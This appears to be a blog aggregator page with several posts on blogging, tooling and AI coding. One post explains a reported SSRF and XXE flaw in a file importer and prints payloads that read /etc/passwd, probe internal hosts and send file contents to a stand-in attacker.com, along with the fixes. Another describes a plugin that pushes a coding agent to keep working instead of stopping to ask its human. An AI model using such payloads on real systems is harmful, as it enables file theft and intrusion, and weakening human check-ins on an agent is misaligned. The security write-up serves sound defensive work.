Posts in Html (20 found)
Kix Panganiban 2 days ago

Utteranc.es is really neat

It's hard to find privacy-respecting (read: not Disqus) commenting systems out there. A couple of good ones recommended by Bear are Cusdis and Komments, but I'm not a huge fan of either of them:

- Cusdis styling is very limited. You can only set it to dark or light mode, with no control over the specific HTML elements and styling. It's fine, but I prefer something that looks a little neater.
- Komments requires manually creating a new page for every new post that you make. The idea is that wherever you want comments, you create a page in Komments and embed that page into your webpage. So you can have one Komments page per blog post, or even one Komments page for your entire blog.

Then I realized that there's a great alternative that I've used in the past: utteranc.es. Its execution is elegant: you embed a tiny JS file on your blog posts, and it will map every page to GitHub Issues in a GitHub repo. In my case, I created this repo specifically for that purpose. Neat! I'm including utteranc.es in all my blog posts moving forward. You can check out how it looks below:
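For reference, the embed snippet looks roughly like this, per the utteranc.es setup docs (the repo value below is a placeholder for whichever public GitHub repo you point it at, and the theme is one of several options):

```html
<script src="https://utteranc.es/client.js"
        repo="your-username/your-comments-repo"
        issue-term="pathname"
        theme="github-light"
        crossorigin="anonymous"
        async>
</script>
```

The `issue-term` attribute controls how pages map to issues; `pathname` means one GitHub issue per page path.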

Manuel Moreale 2 days ago

Karen

This week on the People and Blogs series we have an interview with Karen, whose blog can be found at chronosaur.us. Tired of RSS? Read this in your browser or sign up for the newsletter. The People and Blogs series is supported by Pete Millspaugh and the other 127 members of my "One a Month" club. If you enjoy P&B, consider becoming one for as little as 1 dollar a month.

Hello! My name is Karen. I work in IT support for a large company’s legal department, and am currently working on my Bachelor’s in Cybersecurity and Information Assurance. I live near New Orleans, Louisiana, with my husband and two dogs - Daisy, a Pembroke Welsh Corgi, and Mia, a Chihuahua. Daisy is The Most Serious Corgi Ever (tm), and Mia has the personality of an old lady who chain smokes, plays Bingo every week at the rec center, and still records her soap operas on VHS daily. My husband is an avid maker (woodworking and 3D printing, mostly), video gamer, and has an extensive collection of board games that takes up the entire back wall of our living room.

As for me, outside of work, I’m a huge camera nerd and photographer. I love film photography, and recently learned how to develop my own negatives at home! I also do digital - I will never turn my nose up at one versus the other. I’ve always been into assorted fandoms, and used to volunteer at local sci-fi/fantasy/comic conventions until a few years ago. I got into K-Pop back in 2022, and am now an active participant in the local New Orleans fan community, providing Instax photo booth services for events. I’ve also hosted K-Pop events here in NOLA. My ult K-Pop group is ATEEZ, but I’m a proud multi fan and listen to whatever groups or music catch my attention, including Stray Kids, SHINee, and Mamamoo. I also love 80s and 90s alternative, mainly Depeche Mode, Nine Inch Nails, and Garbage. And yes, I may be named Karen, but I refuse to BE a “Karen”. I don’t get upset when people use the term; I find it hilarious.
So I have been blogging off and on since 2001 or so - back when they were still called “weblogs” and “online journals”. Originally, I was using LiveJournal, but even with a paid account, I wanted to learn more customization and make a site that was truly my own. My husband - then boyfriend - had his own server, and gave me some space on it. I started out creating sites in Microsoft Frontpage and Dreamweaver (BEFORE Adobe owned them!), and moved to using Greymatter blog software, which I loved and miss dearly. I moved to Wordpress in - 2004 maybe? - and used that for all my personal sites until 2024. I’d been reading more and more about the Indieweb for a while and found Bear, and I loved the simplicity. I’ve had sites ranging from a basic daily online journal, to a fashion blog, to a food blog, to a K-Pop and fandom-centric blog, to what it is today - my online space for everything and anything I like.

I taught myself HTML and CSS in order to customize and create my sites. No classes, no courses, no books, no certifications, just Google and looking at other people’s sites to see what I liked and how they did it. At my previous job before this one, I was a web administrator for a local marketing company that built sites using DNN and Wordpress, and I’m proud to say that I got that job and my current one with my self-developed skills and being willing to learn and grow. I would not be where I am today, professionally, if it wasn’t for blogging.

I’ll be totally honest - I don’t have a writing process. I get inspiration from random thoughts, seeing things online, wanting to share the day-to-day of my life. I don’t draft or have someone proofread; I just type out what I feel like writing. When I had blogs focusing on specific things - plus size fashion and K-Pop, respectively - I kept a list of topics and ideas to refer back to when I was stuck for ideas.
That was when I was really focused on playing the SEO and search engine algorithm game, though, where I was trying to stick to the “two-three posts a week” rule in an attempt to boost my search engine results. I don’t do that now. I do still have a list of ideas on my phone, but it’s nothing I am feeling FORCED to stick to. It’s more along the lines of that I had an idea while I was out, and wanted to note it so I don’t forget. Memory is a fickle thing in your late 40s, LOL.

My space absolutely influences my mindset for writing. I prefer to write in the early morning, because my brain operates best then. (I know I am an exception to the rule by being an early bird.) I love weekend mornings when I can get up really early and settle into my recliner with my laptop and coffee, and just listen to some lofi music and feel topics and ideas out. I also made my office/guest bedroom into a cozy little space, with a daybed full of soft blankets and fluffy pillows and cushions, and a lap desk. In all honesty, my preferred location to write is at a coffeeshop first thing in the morning. I love sitting tucked in a booth with a coffee and muffin, headphones on and listening to music, when the sun is just on the cusp of rising and the shop is still a little too chilly. That’s when the creative ideas light up the brightest and the synapses are firing on all cylinders.

Currently, my site is hosted on Bear. I used to be a self-hosted Wordpress devotee, but in mid-late 2024, I got really tired of the bloat that the apps had become. In order to use it efficiently for me, I had to install entirely too many plugins to make it “simpler”. (Shout-out to the Indieweb Wordpress team, though - they work so hard on those plugins!) Of course, the more plugins you have, the less secure your site… My domain is registered through Hostinger. To write my posts, I use Bear Markdown Notes. I heard about this program after seeing a few others talking about using it for drafts, notes, etc.
I honestly don’t think I’d change much! I really love using Bear Blog. It reminds me of the very old school LiveJournal days, or when I used Greymatter. It takes me back to the web being simpler, more straightforward, more fun. I also like Bear’s manifesto, and that he built the service for longevity. I would probably structure my site differently, especially after seeing some personal sites set up with more of a “digital garden” format. I will eventually adjust my site at some point, but for now, I’m fine with it. (That, and between school and work, it’s kind of low on the priority list.)

I purchased a lifetime subscription to Bear after a week of using it, which ran around $200 - I don’t remember exactly. I knew that I was going to be using the service for a while and thought I should invest in a place that I believed in. My Hostinger domain renewals run around $8.99 annually. My blog is just my personal site - I don’t generate any revenue or monetise in any way. I don’t mind when people monetize their site - it’s their site and they can do what they choose. As long as it’s not invading others’ privacy or harmful, I have absolutely no issue. Make that money however you like.

Ooooh, I have three really good suggestions for both checking out and interviewing! Binary Digit - B is kind of an influence for me to play with my site again. They have just this super cool and early 2000s vibe and style that I really love. Their site reminds me of me when I first started blogging, when I was learning new things and implementing what I thought was cool on my site, joining fanlistings, making new online friends. Kevin Spencer - I love Kevin’s writing and especially his photography. Not only that, he has fantastic taste in music. I’ve left many a comment on his site about 80s and 90s synthpop and industrial music. A Parenthetical Departure - Sylvia was one of the first sites I started reading when I started looking up info on Bear Blog.
They are EXTREMELY talented and have an excellent knack for playing with design, and showing others how it works.

One of my side projects is Burn Like A Flame, which is my local K-pop and fandom photography site. I actually just started a project there that is more than slightly based on People and Blogs - The Fandom Story Project. I’m interviewing local fans to talk about what they love and what their feelings are on fandom culture now, and I’m accompanying that with a photoshoot with that person. It’s a way to introduce people to each other within the community.

Two of my favorite YouTube channels that I have recently been watching are focused on fashion discussion and history - Bliss Foster and understitch. If you like learning and listening to information on fashion, I highly recommend these creators.

I know a TON of people have now seen K-Pop Demon Hunters (which I love, and the movie has a great message for not only kids, but adults). If you’ve seen it and are interested in getting into K-Pop, I suggest checking out my favorite group, ATEEZ. If you think that most K-Pop is all chirpy bubbly cutesy songs, let me suggest two by this group that aren’t what you’d expect: Guerrilla and Turbulence. I strongly suggest watching without the translations, and then watching again with them. Their lyrics are the thing that really drew me into this group, and had me learning more about the deeper meaning behind a lot of K-Pop songs.

And finally, THANK YOU to Manu for People and Blogs! I always find some really great new sites to check out after reading these interviews, and I am truly honored to be asked to join this list of great bloggers. It’s inspiring me to work harder on my blog and to post more often.

Now that you're done reading the interview, go check the blog and subscribe to the RSS feed. If you're looking for more content, go read one of the previous 117 interviews.
Make sure to also say thank you to Benny and the other 127 supporters for making this series possible.

Hugo 2 days ago

Securing File Imports: Fixing SSRF and XXE Vulnerabilities

You know who loves new features in applications? Hackers. Every new feature is an additional opportunity, a potential new vulnerability. Last weekend I added the ability to migrate data to writizzy from WordPress (XML file), Ghost (JSON file), and Medium (ZIP archive). And on Monday I received this message:

> Huge vuln on writizzy
>
> Hello, You have a major vulnerability on writizzy that you need to fix asap. Via the Medium import, I was able to download your /etc/passwd. Basically, you absolutely need to validate the images from the Medium HTML!
>
> Your /etc/passwd as proof:
>
> Micka

Since it's possible you might discover this kind of vulnerability, let me show you how to exploit SSRF and XXE vulnerabilities.

## The SSRF Vulnerability

SSRF stands for "Server-Side Request Forgery" - an attack that allows access to vulnerable server resources. But how do you access these resources by triggering a data import with a ZIP archive? The import feature relies on an important principle: I try to download the images that are in the article to be migrated and import them to my own storage (Bunny in my case). For example, imagine I have something like this in a Medium page:

```html
<img src="https://miro.medium.com/max/1400/0*example.jpg">
```

I need to download the image, then re-upload it to Bunny.
During the conversion to markdown, I'll then write this:

```markdown
![](https://cdn.bunny.net/blog/12132132/image.jpg)
```

So to do this, at some point I open a URL to the image:

```kotlin
val imageBytes = try {
    val connection = URL(imageUrl).openConnection()
    connection.setRequestProperty("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36")
    connection.setRequestProperty("Referer", "https://medium.com/")
    connection.setRequestProperty("Accept", "image/avif,image/webp,*/*")
    connection.connectTimeout = 10000
    connection.readTimeout = 10000
    connection.getInputStream().use { it.readBytes() }
} catch (e: Exception) {
    logger.warn("Failed to download image $imageUrl: ${e.message}")
    return imageUrl
}
```

Then I upload the byte array to Bunny. Okay. But what happens if the user writes this:

```html
<img src="file:///etc/passwd">
```

The previous code will try to read the file following the requested protocol - in this case, `file`. Then upload the file content to the CDN. Content that's now publicly accessible. And you can also access internal URLs to scan ports, get sensitive info, etc.:

```html
<img src="http://192.168.1.1:8080/">
```

The vulnerability is quite serious. To fix it, there are several things to do. First, verify the protocol used:

```kotlin
if (url.protocol !in listOf("http", "https")) {
    logger.warn("Unauthorized protocol: ${url.protocol} for URL: $imageUrl")
    return imageUrl
}
```

Then, verify that we're not attacking private URLs:

```kotlin
val host = url.host.lowercase()
if (isPrivateOrLocalhost(host)) {
    logger.warn("Blocked private/localhost URL: $imageUrl")
    return imageUrl
}

// ...

private fun isPrivateOrLocalhost(host: String): Boolean {
    if (host in listOf("localhost", "127.0.0.1", "::1")) return true
    val address = try {
        java.net.InetAddress.getByName(host)
    } catch (_: Exception) {
        return true // When in doubt, block it
    }
    return address.isLoopbackAddress || address.isLinkLocalAddress || address.isSiteLocalAddress
}
```

But here, I still have a risk.
The user can write:

```html
<img src="https://attacker.com/innocent-image.jpg">
```

And this could still be risky if the hacker requests a redirect from this URL to /etc/passwd. So we need to block redirect requests:

```kotlin
val connection = url.openConnection()
if (connection is java.net.HttpURLConnection) {
    connection.instanceFollowRedirects = false
}
connection.setRequestProperty("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36")
connection.setRequestProperty("Referer", "https://medium.com/")
connection.setRequestProperty("Accept", "image/avif,image/webp,*/*")
connection.connectTimeout = 10000
connection.readTimeout = 10000

val responseCode = (connection as? java.net.HttpURLConnection)?.responseCode
if (responseCode in listOf(301, 302, 303, 307, 308)) {
    logger.warn("Refused redirect for URL: $imageUrl (HTTP $responseCode)")
    return imageUrl
}
```

Be very careful with user-controlled connection opening. Except it wasn't over. Second message from Micka:

> You also have an XXE on the WordPress import! Sorry for the spam, I couldn't test to warn you at the same time as the other vuln, you need to fix this asap too :)

## The XXE Vulnerability

XXE (XML External Entity) is a vulnerability that allows injecting external XML entities to:

- Read local files (/etc/passwd, config files, SSH keys...)
- Perform SSRF (requests to internal services)
- Perform DoS (billion laughs attack)

Micka modified the WordPress XML file to add an entity declaration:

```xml
<!DOCTYPE rss [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
...
&xxe;
```

This directive asks the XML parser to go read the content of a local file to use it later. It would also have been possible to send this file to a URL directly:

```xml
<!DOCTYPE rss [
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>
```

And on [http://attacker.com/evil.dtd](http://attacker.com/evil.dtd):

```xml
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/?data=%file;'>">
%all;
```

Finally, to crash a server, the attacker could also have done this:

```xml
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!-- each entity expands the previous one ten times, up to... -->
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
&lol9;
```

This requests the display of over 3 billion characters, crashing the server. There are variants, but you get the idea.
We definitely don't want any of this. This time, we need to secure the XML parser by telling it not to look at external entities:

```kotlin
val factory = DocumentBuilderFactory.newInstance()
// Disable external entities (XXE protection)
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)
factory.setFeature("http://xml.org/sax/features/external-general-entities", false)
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false)
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false)
factory.isXIncludeAware = false
factory.isExpandEntityReferences = false
```

I hope you learned something. I certainly did, because even though I should have caught the SSRF vulnerability, honestly, I would never have seen the one with the XML parser. It's thanks to Micka that I discovered this type of attack. FYI, [Micka](https://mjeanroy.tech/) is a wonderful person I've worked with before at Malt, who works in security. You may have run into him at capture the flag events at Mixit. And he loves trying to find this kind of vulnerability.
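If you're porting these fixes to another stack, here's a rough Python sketch of the same two guards. To be clear, this is my own illustration, not writizzy's code: the function names are invented, the DOCTYPE substring check is a blunt simplification of `disallow-doctype-decl`, and for real-world XML parsing in Python you'd normally reach for the defusedxml library.

```python
import ipaddress
import socket
import xml.etree.ElementTree as ET
from urllib.parse import urlparse


def is_safe_image_url(url: str) -> bool:
    """SSRF guard: allow only http(s) URLs resolving to public addresses."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        return False
    try:
        # Literal IPs pass straight through; hostnames get resolved.
        addr = ipaddress.ip_address(socket.gethostbyname(parsed.hostname or ""))
    except (OSError, ValueError):
        return False  # when in doubt, block it
    return not (addr.is_loopback or addr.is_link_local or addr.is_private)


def parse_untrusted_xml(text: str) -> ET.Element:
    """XXE guard: refuse any DOCTYPE, which is where entity declarations live."""
    if "<!DOCTYPE" in text.upper():
        raise ValueError("DOCTYPE not allowed in uploaded XML")
    return ET.fromstring(text)


assert not is_safe_image_url("file:///etc/passwd")
assert not is_safe_image_url("http://127.0.0.1:8080/admin")
assert not is_safe_image_url("http://192.168.1.1/")
assert parse_untrusted_xml("<rss><title>ok</title></rss>").tag == "rss"
```

Note that blocking on resolved addresses still leaves DNS-rebinding edge cases; the redirect-refusal trick from the Kotlin code above applies the same way here.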

Kix Panganiban 4 days ago

First make it fast, then make it smart

In the speed vs. intelligence spectrum, I've always figured the smarter AI models would outperform faster ones in all but the most niche cases. On paper and in benchmarks, that often holds true. But I've learned -- at least for me personally -- that faster models bring way more utility to the table.

Man, I hate the word "agentic." I find it trendy and pretentious, but "AI-assisted coding" is a mouthful with too many syllables, so I'll begrudgingly stick with "agentic" coding for now.

When it comes to agentic coding, the instinct is to pick a smart model that can make clever changes to your code. You know, the kind that thinks out loud, noodles on an idea for a bit, then writes code and stares at it for a bit. On the surface, that seems like the way to go -- but for me, it's often a productivity killer. I've got ADHD, and even on meds, my attention span is flaky at best. Waiting for a model to "think" while it performs a task makes me lose focus on what it's even doing. (This is also why I don't believe in running agents in parallel, or in huge plan-think-execute loops like what Google Antigravity does.) My brain wanders off, and by the time the model's done, I've got to context-switch back to review its work. Then I ask for changes, wait again, and repeat the cycle. It's slow, painfully boring, and doesn't even guarantee I'll get what I want. Those little dead-air moments are what ruin it for me.

I took a break from agentic coding for a while and went back to writing code by hand. No waiting, no boredom, and I always got exactly what I needed (usually). But then I realized something -- not all coding tasks need deep thought. My buddy Alex likes to call them "leaf node edits": small, trivial changes that are more mechanical than cerebral. Think splitting functions, renaming stuff, or writing HTML and Markdown. These are perfect to delegate to AI because failing at tasks like these is rarely consequential, and mistakes are easier to spot.
I think the real trick here is to not rely on AI to think or make architectural or design decisions. Do the planning and heavy lifting yourself; just use the tool for fast, broad-sweeping autocomplete. It's less like hiring a programmer and more like extending your typing speed.

I once wrote about how Dumb Cursor is the best Cursor and that Cursor peaked with its first Composer release (I don't know why they chose to name two distinctly different features the same, but who knows anything these days). I take it all back. Composer is back with a vengeance, and it's fast. Aggressively fine-tuned for parallel tool calling, it flies through making changes -- even if it's not that smart. It makes silly mistakes and sometimes spits out vibe-codey slop (think: too many inline comments) -- but because it's so dang quick, it's a joy to use. For those leaf node edits, speed beats smarts every time.

I've also tinkered with other fast models like Gemini Flash. It's cheap and decently smart, but it's just too unreliable for me. Google's API endpoints randomly conk out, I've found that it struggles with tool calling, and it'll hallucinate if you stuff too much into its context (which it touts as obnoxiously large). I'm sure there are workarounds -- but I don't want to fuss with it. My goal with agentic coding is low-friction help, not a side project to debug the tool itself.

Then there are superfast inference providers like Cerebras, Sambanova, and Groq. They let you run open-weight, smart models (think Qwen or Kimi) at lightning speed. If I weren't already using Cursor, I'd probably go back to Roo or Crush with these. I just don't want to be managing multiple providers, API keys, and strict rate limiting -- it feels like a hassle, kinda defeating the purpose of a fast model. At the end of the day, my brain craves tools that keep up with me, not ones that make me wait.
Faster models might not be the smartest, but for leaf node edits and mechanical tasks, I find them to be much more palatable. I'd rather iterate quickly and fix small goofs than sit through a slow model's deep thoughts. Turns out, speed isn't just a feature for me -- it's a necessity.

Manuel Moreale 1 week ago

Alexandra Wolfe

This week on the People and Blogs series we have an interview with Alexandra Wolfe, whose blog can be found at wrywriter.ca. Tired of RSS? Read this in your browser or sign up for the newsletter. The People and Blogs series is supported by Piet Terheyden and the other 124 members of my "One a Month" club. If you enjoy P&B, consider becoming one for as little as 1 dollar a month.

I’m a viviparous, mammalian, carbon-based biped — a veritable fossil from a bygone age sometimes referred to as the Good Old Days. Though, to be honest, that’s debatable to the nth degree. I was born in Germany to British parents and moved across the planet every 2-3 years, all of which seemed very natural to me at the time. Apart from studying for 3 degrees (I never finished any of them) I did several years in the military ostensibly as an air traffic controller. I then somehow stumbled from there into the print & publishing trade and made a comfortable living working on books and magazines. I even rubbed shoulders with a few names over the years, which in and of itself, was pleasantly entertaining.

Being in the publishing trade allowed me to indulge in a number of my fav hobbies, including publishing a couple of scifi ezines over the years, running a Star Trek club, hanging out at several scifi and comic cons, and meeting the stars and writers of many of my fav scifi shows. I still have the photographic evidence to prove it.

I didn’t so much decide to blog as stumble into it; like many back in the days of LiveJournal and MySpace, we all just followed the crowd. It then seemed logical (at the time) to upgrade from a MySpace account to bumbling around with HTML, creating a static website that was then quickly superseded by me creating an official ‘Blog’. At that point I was using the then-new Wordpress software. It was, for me at least, revolutionary. Suddenly, everyone was blogging about everything.
It’s at that point I think I bought my first domain name: wrywriter. I used the dot com version right up until a few years ago, when I added the dot ca version and, sadly, let the dot com version lapse. Though now, I wish I had kept it. I still have the name, but have moved away from Wordpress and blog ‘lightly’ using Bear Blog and Micro Blog to scribble and share my thoughts on. Clean, small, simple, and more focused on the actual writing and less on the tweaking and tinkering. Both platforms suit my current needs.

I’m not sure I have a process per se. I don’t plan posts, and don’t jot down ideas. I’m more of a pantser; I stare at the blinking cursor only when I feel like I have something to say. Whether that be some random thought I had over breakfast, a news item I want to respond to, or a response to someone else’s post. I don’t do research, or make drafts, or have endless notebooks full of ideas. Unless we’re talking about short stories or ideas for novels. Blogging, for me, is more about spontaneity.

I would have to say that physical space can and probably does influence how anyone writes. And that we all have our own particular quirks and eccentricities when it comes to our writing environment. I like mine to be quiet, clean, and minimal. There are a few toys I have at hand I play with, but other than that, it’s me and the keyboard, and a large screen.

You’re asking a dinosaur who somehow lived long enough to stumble into a Jetsons future what my Tech Stack is? Excuse me while I consult someone smarter than I am about what a tech stake might look like. Oh, you mean where did I buy my domain name and that sort of thing? I want to say Porkbun, because I just love saying Porkbun. But no such luck; I sourced my domains here in Canada with WHC.ca and, at one time, I had hosting with them - that is, till they kept putting their prices up. I also got very disillusioned by Wordpress, so moved full time to Bear Blog and Micro Blog.
I use Bear for more long-form rambling posts and post my daily thoughts over on m.b., which is more suited to sharing said drivel on social media.

I find this a bit of an odd question. My experience is based on what I went through, that ‘living’ experience of places and spaces that no longer exist, so of course, in the here and now, it would all be different. I would probably start off with a simple blog on Bear or the Pika platform and skip the likes of Blogger and Wordpress altogether.

The web might be obsessed with money, but I’d say most bloggers are not. I’m not interested in monetising my blog, nor am I interested in reading blogs that are focused on making money. I avoid them like the plague. If someone quietly and respectfully asks me to support their writing, however, with a discreet ‘Buy Me A Coffee’ button, then I’m almost always happy to make a donation.

There are so many great blogs about at the moment, but some of my current fav reads are below. I would humbly suggest you ask David Johnson of Crossing The Threshold for an interview. David lives in Hawaii and always has some thoughtful posts to read on his blog.

There are many things I’m always working on when it comes to writing projects. I do love to scribble. You can find more over on Alexandra Wolfe (alexandrawolfe.ca) and read my daily posts over on the Wry Writer (wrywriter.ca). For those of you out there who love reading fantasy, I stumbled upon a great series by Robert Jackson Bennett, starting with The Tainted Cup and followed by A Drop Of Corruption. I sincerely hope there’s more in the series. Some fun websites people might like to check out are listed below as well.

And finally, I would like to extend a big thank you to Robert Birming for suggesting I join in this amazing series, People & Blogs, and an even bigger thank you to you, Manu, for asking me to take part. I feel honoured to be among such esteemed alumni.
Much love, Alex

Now that you're done reading the interview, go check the blog and subscribe to the RSS feed. If you're looking for more content, go read one of the previous 116 interviews. Make sure to also say thank you to Chuck Grimmett and the other 124 supporters for making this series possible.

Fav reads:

- David at www.crossingthethreshold.net
- Sylvia at sylvia.buzz
- David at forkingmad.blog
- Kimberly at kimberlykg.com
- Robert at robertbirming.com
- Annie at anniemueller.com

Fun websites:

- My life in Weeks (weeks.ginatrapani.org)
- Notebook of Ghosts (notebookofghosts.com)
- Shady Characters (shadycharacters.co.uk)


Automating agentic development

This week, I visited my friends at 2389 in Chicago. These are the folks who took my journal plugin for Claude Code and ran with the idea, creating botboard.biz, a social media platform for your team's coding agents. They also put together an actual research paper proving that both tools improve coding outcomes and reduce costs. Harper is one of the folks behind 2389...and the person who first suggested to me that maybe I could do something about our coding agents' propensity for saying things like: His initial suggestion was that maybe I could make a single-key keyboard that just sends Back in May, I made one of those. When I added keyboard support to the Easy button, I made sure not to disable the speaker. So it helpfully exclaimed "That was easy!" every time it sent: But...you still had to press the button. I'm pretty sure the button got used for at least a day before it was...retired. But the problem it was designed to solve is very, very real. And pretty frustrating.

Yesterday morning, sitting in 2389's offices, we spent a bunch of time talking about automating ourselves out of a job. In that spirit, I finally dug enough into Claude Code hooks to build out the first version of Double Shot Latte, a Claude Code plugin that, hopefully, makes this a thing of the past.

DSL is implemented as a Claude Code "Stop" hook. Any time Claude thinks it should stop and ask for human interaction, it first runs this hook. The hook hands off the last couple of messages to another instance of Claude with a prompt asking it to judge whether Claude genuinely needs the human's help or whether it's just craving attention. It tries to err on the side of pushing Claude to keep working. To try to avoid situations where it misjudges Claude's ability to keep working without guidance, it bails out if Claude tries to stop three times in five minutes.

Testing DSL was...a little bit tricky.
I needed to find situations where Claude would work for a bit and then stop and ask for my approval to keep working. Naturally, I asked Claude for test scenarios. The first was "build a full ecommerce platform." Claude cranked for about 20 minutes before stopping. I thought the judge agent hadn't worked, but...Claude had actually fulfilled the entire spec and built out an ecommerce platform. (The actual implementation was nothing to write home about, but I'm genuinely not sure what it could have done next without a little more direction.)

The second attempt fared no better. On Claude's advice, I asked another Claude to build out an HTML widget toolkit. Once again, it cranked for a while. It built widgets. It wrote tests. It wrote a Storybook. And when it stopped for the first time...I couldn't actually fault it.

Slightly unsure how to test things, I put this all aside for a bit to work on another project. I opened up Claude Code, and it greeted me like it normally does. And instead of stopping there like it usually would, it noticed that there were uncommitted files in my working directory and started to dig through each of them, trying to reverse engineer the current project. Success! (I stopped it so that I could tell it what I actually wanted.)

Double Shot Latte will absolutely burn more tokens than you're burning now. You might want to think twice about using it unsupervised. If you want to put Claude Code into turbo mode, DSL is available on the Superpowers marketplace. If you don't yet have the Superpowers marketplace set up, you'll need to do that before you can install Double Shot Latte. Once you have the marketplace installed, run the install command inside Claude Code, then restart Claude Code so it can pick up the new hook.
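The three-stops-in-five-minutes bail-out is easy to picture. Here's a minimal sketch of that rate-limit logic (my own reconstruction from the description above, with invented names - not DSL's actual code, which lives in the hook itself):

```python
import time
from collections import deque


class StopGuard:
    """Allow a genuine stop only after Claude has tried to stop
    max_stops times within window_seconds; otherwise push it on."""

    def __init__(self, max_stops: int = 3, window_seconds: float = 300.0):
        self.max_stops = max_stops
        self.window = window_seconds
        self.attempts = deque()

    def should_allow_stop(self, now=None) -> bool:
        now = time.monotonic() if now is None else now
        self.attempts.append(now)
        # Forget stop attempts that fell outside the sliding window.
        while self.attempts and now - self.attempts[0] > self.window:
            self.attempts.popleft()
        return len(self.attempts) >= self.max_stops


guard = StopGuard()
assert guard.should_allow_stop(now=0.0) is False    # first stop: keep working
assert guard.should_allow_stop(now=60.0) is False   # second stop: keep working
assert guard.should_allow_stop(now=120.0) is True   # third inside 5 min: bail out
```

The real hook additionally has to make the judgment call itself (by prompting a second Claude instance); this only captures the safety valve around it.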

Simon Willison 1 week ago

How I automate my Substack newsletter with content from my blog

I sent out my weekly-ish Substack newsletter this morning and took the opportunity to record a YouTube video demonstrating my process and describing the different components that make it work. There's a lot of digital duct tape involved, taking the content from Django+Heroku+PostgreSQL to GitHub Actions to SQLite+Datasette+Fly.io to JavaScript+Observable and finally to Substack.

The core process is the same as I described back in 2023. I have an Observable notebook called blog-to-newsletter which fetches content from my blog's database, filters out anything that has been in the newsletter before, formats what's left as HTML, and offers a big "Copy rich text newsletter to clipboard" button. I click that button, paste the result into the Substack editor, tweak a few things, and hit send. The whole process usually takes just a few minutes, and I make only very minor edits. That's the whole process!

The most important cell in the Observable notebook is this one: This uses the JavaScript function to pull data from my blog's Datasette instance, using a very complex SQL query that is composed elsewhere in the notebook. Here's a link to see and execute that query directly in Datasette. It's 143 lines of convoluted SQL that assembles most of the HTML for the newsletter using SQLite string concatenation! An illustrative snippet: My blog's URLs look like - this SQL constructs that three-letter month abbreviation from the month number using a substring operation. This is a terrible way to assemble HTML, but I've stuck with it because it amuses me.

The rest of the Observable notebook takes that data, filters out anything that links to content mentioned in the previous newsletters, and composes it into a block of HTML that can be copied using that big button. Here's the recipe it uses to turn HTML into rich text content on a clipboard suitable for Substack.
I can't remember how I figured this out but it's very effective: My blog itself is a Django application hosted on Heroku, with data stored in Heroku PostgreSQL. Here's the source code for that Django application . I use the Django admin as my CMS. Datasette provides a JSON API over a SQLite database... which means something needs to convert that PostgreSQL database into a SQLite database that Datasette can use. My system for doing that lives in the simonw/simonwillisonblog-backup GitHub repository. It uses GitHub Actions on a schedule that executes every two hours, fetching the latest data from PostgreSQL and converting that to SQLite. My db-to-sqlite tool is responsible for that conversion. I call it like this : That command uses Heroku credentials in an environment variable to fetch the database connection URL for my blog's PostgreSQL database (and fixes a small difference in the URL scheme). can then export that data and write it to a SQLite database file called . The options specify the tables that should be included in the export. The repository does more than just that conversion: it also exports the resulting data to JSON files that live in the repository, which gives me a commit history of changes I make to my content. This is a cheap way to get a revision history of my blog content without having to mess around with detailed history tracking inside the Django application itself. At the end of my GitHub Actions workflow is this code that publishes the resulting database to Datasette running on Fly.io using the datasette publish fly plugin: As you can see, there are a lot of moving parts! Surprisingly it all mostly just works - I rarely have to intervene in the process, and the cost of those different components is pleasantly low. You are only seeing the long-form articles from my blog. Subscribe to /atom/everything/ to get all of my posts, or take a look at my other subscription options . The core process is the same as I described back in 2023 . 
I have an Observable notebook called blog-to-newsletter which fetches content from my blog's database, filters out anything that has been in the newsletter before, formats what's left as HTML and offers a big "Copy rich text newsletter to clipboard" button. I click that button, paste the result into the Substack editor, tweak a few things and hit send. The whole process usually takes just a few minutes. I make very minor edits: I set the title and the subheading for the newsletter. This is often a direct copy of the title of the featured blog post. Substack turns YouTube URLs into embeds, which often isn't what I want - especially if I have a YouTube URL inside a code example. Blocks of preformatted text often have an extra blank line at the end, which I remove. Occasionally I'll make a content edit - removing a piece of content that doesn't fit the newsletter, or fixing a time reference like "yesterday" that doesn't make sense any more. I pick the featured image for the newsletter and add some tags.
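The month-number-to-abbreviation substring trick can be sketched in a few lines of Python against an in-memory SQLite database. This is the generic SQLite idiom, not Simon's actual 143-line query:

```python
import sqlite3

# The newsletter SQL builds the three-letter month abbreviation (e.g. "oct")
# with a substring operation. The standard SQLite idiom indexes into a
# packed string of all twelve abbreviations:
MONTH_ABBREV_SQL = """
select substr('janfebmaraprmayjunjulaugsepoctnovdec',
              (:month - 1) * 3 + 1, 3)
"""

def month_abbrev(month: int) -> str:
    with sqlite3.connect(":memory:") as conn:
        return conn.execute(MONTH_ABBREV_SQL, {"month": month}).fetchone()[0]

print(month_abbrev(10))  # oct
```

Month 10 starts at character position (10 - 1) * 3 + 1 = 28, and `substr` takes three characters from there.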

iDiallo 1 week ago

How Do You Send an Email?

It's been over a year and I haven't received a single notification email from my web server. It could either mean that my $6 VPS is amazing and hasn't gone down once this past year. Or it could mean that my health check service has gone down. Well, this year I have received emails from readers telling me my website was down. So after doing some digging, I discovered that my health checker works just fine, but all the emails it sends are being rejected by Gmail. Unless you use a third-party service, you have little to no chance of sending an email that gets delivered.

Every year, email services seem to become a tad more expensive. When I first started this website, sending emails to my subscribers was free on Mailchimp. Now it costs $45 a month. On Buttondown, as of this writing, it costs $29 a month. What are they doing that costs so much? It seems like sending emails is impossibly hard, something you can almost never do yourself. You have to rely on established services if you want any guarantee that your email will be delivered. But is it really that complicated?

